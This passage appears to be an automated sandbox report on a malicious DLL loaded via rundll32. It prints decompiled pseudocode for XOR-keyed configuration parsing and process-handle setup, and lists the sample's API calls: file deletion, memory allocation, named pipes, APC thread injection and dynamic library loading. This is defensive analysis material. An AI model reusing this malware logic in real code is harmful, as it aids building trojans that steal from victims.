                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                          • String ID:
                                                          • API String ID: 3888849384-0
                                                          • Opcode ID: cf0a7ff2aa23eed808d1cb723993cfe00d338986985e82783ebe6373fccfe8ca
                                                          • Instruction ID: d467b47d8f21910fcd756203d13748872f610010ed66f99111cd41337607f28f
                                                          • Opcode Fuzzy Hash: cf0a7ff2aa23eed808d1cb723993cfe00d338986985e82783ebe6373fccfe8ca
                                                          • Instruction Fuzzy Hash: 5C313C72D1420DFFDB01AFA4ED88CAEBBBEEB48354B104426E605E3111E735AE559F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1645 Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E036D1645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x36da344; // 0x69b25f44
				if(E036D7780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x36da378 = _v8;
				}
				_t33 =  *0x36da344; // 0x69b25f44
				if(E036D7780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x36da344; // 0x69b25f44
				_push(_t115);
				if(E036D7780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x36da2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x36da344; // 0x69b25f44
						_t45 = E036D5450(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x36da2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x36da344; // 0x69b25f44
						_t46 = E036D5450(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x36da2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x36da344; // 0x69b25f44
						_t47 = E036D5450(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x36da2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x36da344; // 0x69b25f44
						_t48 = E036D5450(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x36da004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x36da344; // 0x69b25f44
						_t49 = E036D5450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x36da02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x36da344; // 0x69b25f44
						_t50 = E036D5450(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x36da2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x36da344; // 0x69b25f44
								_t51 = E036D5450(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E036D2FBC(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E036D72C7();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x36da344; // 0x69b25f44
								_t52 = E036D5450(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E036D2FBC(0, _t52) != 0) {
								_t121 =  *0x36da3cc; // 0x59695b0
								E036D765B(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x36da344; // 0x69b25f44
								_t53 = E036D5450(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x36da348; // 0x228d5a8
								_t22 = _t54 + 0x36db252; // 0x616d692f
								 *0x36da374 = _t22;
								goto L60;
							} else {
								_t64 = E036D2FBC(0, _t53);
								 *0x36da374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x36da344; // 0x69b25f44
										_t56 = E036D5450(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x36da348; // 0x228d5a8
										_t23 = _t57 + 0x36db79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E036D2FBC(0, _t56);
									}
									 *0x36da3e0 = _t58;
									HeapFree( *0x36da2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1645
                                                          0x036d1648
                                                          0x036d1665
                                                          0x036d1673
                                                          0x036d1673
                                                          0x036d1678
                                                          0x036d1692
                                                          0x036d1900
                                                          0x036d1907
                                                          0x036d190b
                                                          0x036d190b
                                                          0x036d1698
                                                          0x036d169d
                                                          0x036d16b5
                                                          0x036d18ed
                                                          0x036d18f7
                                                          0x00000000
                                                          0x036d16bb
                                                          0x036d16bb
                                                          0x036d16bc
                                                          0x036d16c1
                                                          0x036d16d7
                                                          0x036d16c3
                                                          0x036d16c3
                                                          0x036d16d0
                                                          0x036d16d0
                                                          0x036d16d9
                                                          0x036d16e2
                                                          0x036d16e4
                                                          0x036d16ee
                                                          0x036d16f3
                                                          0x036d16f3
                                                          0x036d16ee
                                                          0x036d16fa
                                                          0x036d1710
                                                          0x036d16fc
                                                          0x036d16fc
                                                          0x036d1709
                                                          0x036d1709
                                                          0x036d1714
                                                          0x036d1716
                                                          0x036d1720
                                                          0x036d1725
                                                          0x036d1725
                                                          0x036d1720
                                                          0x036d172c
                                                          0x036d1742
                                                          0x036d172e
                                                          0x036d172e
                                                          0x036d173b
                                                          0x036d173b
                                                          0x036d1746
                                                          0x036d1748
                                                          0x036d1752
                                                          0x036d1757
                                                          0x036d1757
                                                          0x036d1752
                                                          0x036d175e
                                                          0x036d1774
                                                          0x036d1760
                                                          0x036d1760
                                                          0x036d176d
                                                          0x036d176d
                                                          0x036d1778
                                                          0x036d177a
                                                          0x036d1784
                                                          0x036d1789
                                                          0x036d1789
                                                          0x036d1784
                                                          0x036d1790
                                                          0x036d17a6
                                                          0x036d1792
                                                          0x036d1792
                                                          0x036d179f
                                                          0x036d179f
                                                          0x036d17aa
                                                          0x036d17ac
                                                          0x036d17b6
                                                          0x036d17bb
                                                          0x036d17bb
                                                          0x036d17b6
                                                          0x036d17c2
                                                          0x036d17d8
                                                          0x036d17c4
                                                          0x036d17c4
                                                          0x036d17d1
                                                          0x036d17d1
                                                          0x036d17dc
                                                          0x036d17ef
                                                          0x036d17ef
                                                          0x00000000
                                                          0x036d17de
                                                          0x036d17de
                                                          0x036d17e8
                                                          0x00000000
                                                          0x036d17f9
                                                          0x036d17f9
                                                          0x036d17fb
                                                          0x036d1811
                                                          0x036d17fd
                                                          0x036d17fd
                                                          0x036d180a
                                                          0x036d180a
                                                          0x036d1815
                                                          0x036d1817
                                                          0x036d181a
                                                          0x036d181b
                                                          0x036d1822
                                                          0x036d1824
                                                          0x036d1825
                                                          0x036d1825
                                                          0x036d1822
                                                          0x036d182c
                                                          0x036d1842
                                                          0x036d182e
                                                          0x036d182e
                                                          0x036d183b
                                                          0x036d183b
                                                          0x036d1846
                                                          0x036d1854
                                                          0x036d185e
                                                          0x036d185e
                                                          0x036d1866
                                                          0x036d187c
                                                          0x036d1868
                                                          0x036d1868
                                                          0x036d1875
                                                          0x036d1875
                                                          0x036d1880
                                                          0x036d1893
                                                          0x036d1893
                                                          0x036d1898
                                                          0x036d189e
                                                          0x00000000
                                                          0x036d1882
                                                          0x036d1885
                                                          0x036d188a
                                                          0x036d1891
                                                          0x036d18a3
                                                          0x036d18a5
                                                          0x036d18bb
                                                          0x036d18a7
                                                          0x036d18a7
                                                          0x036d18b4
                                                          0x036d18b4
                                                          0x036d18bf
                                                          0x036d18cb
                                                          0x036d18d0
                                                          0x036d18d0
                                                          0x036d18c1
                                                          0x036d18c4
                                                          0x036d18c4
                                                          0x036d18de
                                                          0x036d18e3
                                                          0x036d18e9
                                                          0x00000000
                                                          0x036d18ec
                                                          0x00000000
                                                          0x036d1891
                                                          0x036d1880
                                                          0x036d17e8
                                                          0x036d17dc

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D16EA
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D171C
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D174E
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D1780
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D17B2
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,036DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 036D17E4
                                                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 036D18E3
                                                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 036D18F7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: cfc30bdf0306c73dc9946a8ccd4319c6f519b110c6ace7e0ae9053c69cd70619
                                                          • Instruction ID: 831df1c5c2b258ef827b45fbd88a39d2f79bf8ece6c27c58cf7b02584c647bff
                                                          • Opcode Fuzzy Hash: cfc30bdf0306c73dc9946a8ccd4319c6f519b110c6ace7e0ae9053c69cd70619
                                                          • Instruction Fuzzy Hash: 2581C374E05204AFC750EBF5DE88D6FB7EEAB4E60072C0D29E402D760CE6B5DA518764
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062765C2 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,06272028,?), ref: 0627867A
                                                            • Part of subcall function 06278669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,06272028,?), ref: 06278697
                                                          • FreeLibrary.KERNEL32(?), ref: 062766F8
                                                            • Part of subcall function 0628AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0627663D,?,?), ref: 0628AFCF
                                                            • Part of subcall function 0628AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0627663D,?,?), ref: 0628AFF8
                                                            • Part of subcall function 0628AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0628B018
                                                            • Part of subcall function 0628AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0628B034
                                                            • Part of subcall function 0628AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B040
                                                            • Part of subcall function 0628AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0627663D,?,?), ref: 0628B043
                                                            • Part of subcall function 0628AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B04F
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B06C
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B086
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B09C
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0B2
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0C8
                                                            • Part of subcall function 0628AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0628B0DE
                                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0627664E
                                                          • lstrlenW.KERNEL32(?), ref: 0627666A
                                                          • lstrlenW.KERNEL32(?), ref: 06276682
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627669B
                                                          • lstrcpyW.KERNEL32(00000002), ref: 062766B0
                                                            • Part of subcall function 06291C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,062766C0,?,00000000,?), ref: 06291CAB
                                                            • Part of subcall function 06291C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,062766C0,?,00000000,?), ref: 06291CCD
                                                            • Part of subcall function 06291C9B: lstrcpyW.KERNEL32(00000000,?), ref: 06291CF9
                                                            • Part of subcall function 06291C9B: lstrcatW.KERNEL32(00000000,?), ref: 06291D0C
                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 062766D8
                                                          • FindClose.KERNEL32(00000002), ref: 062766E6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                          • String ID:
                                                          • API String ID: 1209511739-0
                                                          • Opcode ID: ab451505831273b74b80c3976ba04e828aa80c8e966217239b4e1f533f21158f
                                                          • Instruction ID: 6158ab1c0ab93920907564eda6d087d650ac7a2cd9c765290373b7c8de414aed
                                                          • Opcode Fuzzy Hash: ab451505831273b74b80c3976ba04e828aa80c8e966217239b4e1f533f21158f
                                                          • Instruction Fuzzy Hash: 0B414C71914306AFC751EF61EC48E2FBBE9FB84704F040929F994A2150DB34DA18CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062799BC Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000), ref: 062799D4
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 06279A3D
                                                          • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 06279A65
                                                          • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 06279AB7
                                                          • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 06279AC2
                                                          • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 06279AD5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                          • String ID:
                                                          • API String ID: 499515686-0
                                                          • Opcode ID: b1f0b71faa6092ec619070260ed624bccc7880b56ede225243d43f0991017d15
                                                          • Instruction ID: c5f09449c4ebf7a955519cb2132658499428284cbbc9e80778ac62d9ffd7557f
                                                          • Opcode Fuzzy Hash: b1f0b71faa6092ec619070260ed624bccc7880b56ede225243d43f0991017d15
                                                          • Instruction Fuzzy Hash: CB413771D2130AEFDF81EFA5DC88EAE7BB9AF40314F104165E911A6190DB708A80DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628EAC5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628EAE7
                                                            • Part of subcall function 06287950: NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                            • Part of subcall function 06287950: RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                            • Part of subcall function 06287950: SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 0628EBF7
                                                            • Part of subcall function 062736BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 062736D3
                                                          • memcpy.NTDLL(00000218,062938A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0628EB76
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0628EBD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2966525677-3916222277
                                                          • Opcode ID: cd9b744c173fa96600ab8dda224b9ed36882d463d37e01d30ba1b7a81f345a13
                                                          • Instruction ID: bf1b92d1baf449cb269e5b0fc16399bd36868592750816111c3c3cbca3a0be6e
                                                          • Opcode Fuzzy Hash: cd9b744c173fa96600ab8dda224b9ed36882d463d37e01d30ba1b7a81f345a13
                                                          • Instruction Fuzzy Hash: EC31837191130AAFDBA0EF64DD89AAAB7B8FF04304F10456AE956E7280D730AA44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628D7F1 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          • API String ID: 368790112-0
                                                          • Opcode ID: aaeca94514539444eb8d77539360e9cf57183c2a33d7157cfbc44091fba8e476
                                                          • Instruction ID: 54b31b69d769e7583db1aef47d6c64bc9aed656d266f0fd1da05281349eee4ce
                                                          • Opcode Fuzzy Hash: aaeca94514539444eb8d77539360e9cf57183c2a33d7157cfbc44091fba8e476
                                                          • Instruction Fuzzy Hash: 37F10330911B9ACFDB71DF68C9846AABBF4BF41300F244D6DC9E7866C1D231AA49CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062786AD Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0627E23D,00000000,76CDF5B0,06280348,?,00000001), ref: 062786CD
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062786E2
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062786FE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06278713
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06278727
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressProc
                                                          • String ID:
                                                          • API String ID: 1469910268-0
                                                          • Opcode ID: 1a82dc00a14ec57e35c505ef5041ede53dad4cc42c1704f2e551cc7a8c0f4c37
                                                          • Instruction ID: a41b00e4ef71f48f719997a4994116d7f7d613df47127884925f1a5bcaaf21b2
                                                          • Opcode Fuzzy Hash: 1a82dc00a14ec57e35c505ef5041ede53dad4cc42c1704f2e551cc7a8c0f4c37
                                                          • Instruction Fuzzy Hash: CA313876A203119FDB45CF58F889E5573EAFB8A360B05406AEA09DB250D778E8428F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6D78 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D6D78(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x36da30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x36da2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x36da2f8 = _t6;
					 *0x36da304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x36da2f4 = _t7;
					if(_t7 == 0) {
						 *0x36da2f4 =  *0x36da2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x036d6d80
                                                          0x036d6d86
                                                          0x036d6d8d
                                                          0x00000000
                                                          0x036d6de7
                                                          0x036d6d8f
                                                          0x036d6d97
                                                          0x036d6da4
                                                          0x036d6da4
                                                          0x036d6de4
                                                          0x00000000
                                                          0x036d6de4
                                                          0x036d6da6
                                                          0x036d6da6
                                                          0x036d6dab
                                                          0x036d6dbd
                                                          0x036d6dc2
                                                          0x036d6dc8
                                                          0x036d6dce
                                                          0x036d6dd5
                                                          0x036d6dd7
                                                          0x036d6dd7
                                                          0x00000000
                                                          0x036d6dde
                                                          0x036d6da0
                                                          0x00000000
                                                          0x00000000
                                                          0x036d6da2
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,036D1D07,?), ref: 036D6D80
                                                          • GetVersion.KERNEL32 ref: 036D6D8F
                                                          • GetCurrentProcessId.KERNEL32 ref: 036D6DAB
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 036D6DC8
                                                          • GetLastError.KERNEL32 ref: 036D6DE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: baa5c38a166feee05ea7ee0b45a29c69ad7a0b80efc394e1685b568a66c5c8f6
                                                          • Instruction ID: cf14e5f2940f2570bbb84f6eb33358c522338cc39661fe4866368449adb4854f
                                                          • Opcode Fuzzy Hash: baa5c38a166feee05ea7ee0b45a29c69ad7a0b80efc394e1685b568a66c5c8f6
                                                          • Instruction Fuzzy Hash: B4F0C270E86302ABDB20FF66FA09F147BA1AB44701F58501DE992D62CCD7758070CF18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D77A Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0627D7D0
                                                          • lstrlenW.KERNEL32(?), ref: 0627D7DE
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0627D809
                                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 0627D837
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Query$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3961825720-0
                                                          • Opcode ID: 88e5e38efb8c28174c382cff53c7eb88cdad143d7a8d369e6867de8768346eb4
                                                          • Instruction ID: 6fb943bf8bea46cd05789c7946e5669b64756934743a766dca4a7f77a455b6a2
                                                          • Opcode Fuzzy Hash: 88e5e38efb8c28174c382cff53c7eb88cdad143d7a8d369e6867de8768346eb4
                                                          • Instruction Fuzzy Hash: A4416D7191020AEFDF519FA8DC84E9EBBB9EF44354F004429FD05A7260D770EA12CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062881F1 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0629A1E8,00000001), ref: 06288215
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288260
                                                            • Part of subcall function 062873AA: CreateThread.KERNEL32(00000000,00000000,00000000,0628893A,0629A174,06290998), ref: 062873C1
                                                            • Part of subcall function 062873AA: QueueUserAPC.KERNEL32(0628893A,00000000,?,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873D6
                                                            • Part of subcall function 062873AA: GetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873E1
                                                            • Part of subcall function 062873AA: TerminateThread.KERNEL32(00000000,00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873EB
                                                            • Part of subcall function 062873AA: CloseHandle.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873F2
                                                            • Part of subcall function 062873AA: SetLastError.KERNEL32(00000000,?,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062873FB
                                                          • GetLastError.KERNEL32(06281FE9,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288248
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06288258
                                                          Memory Dump Source
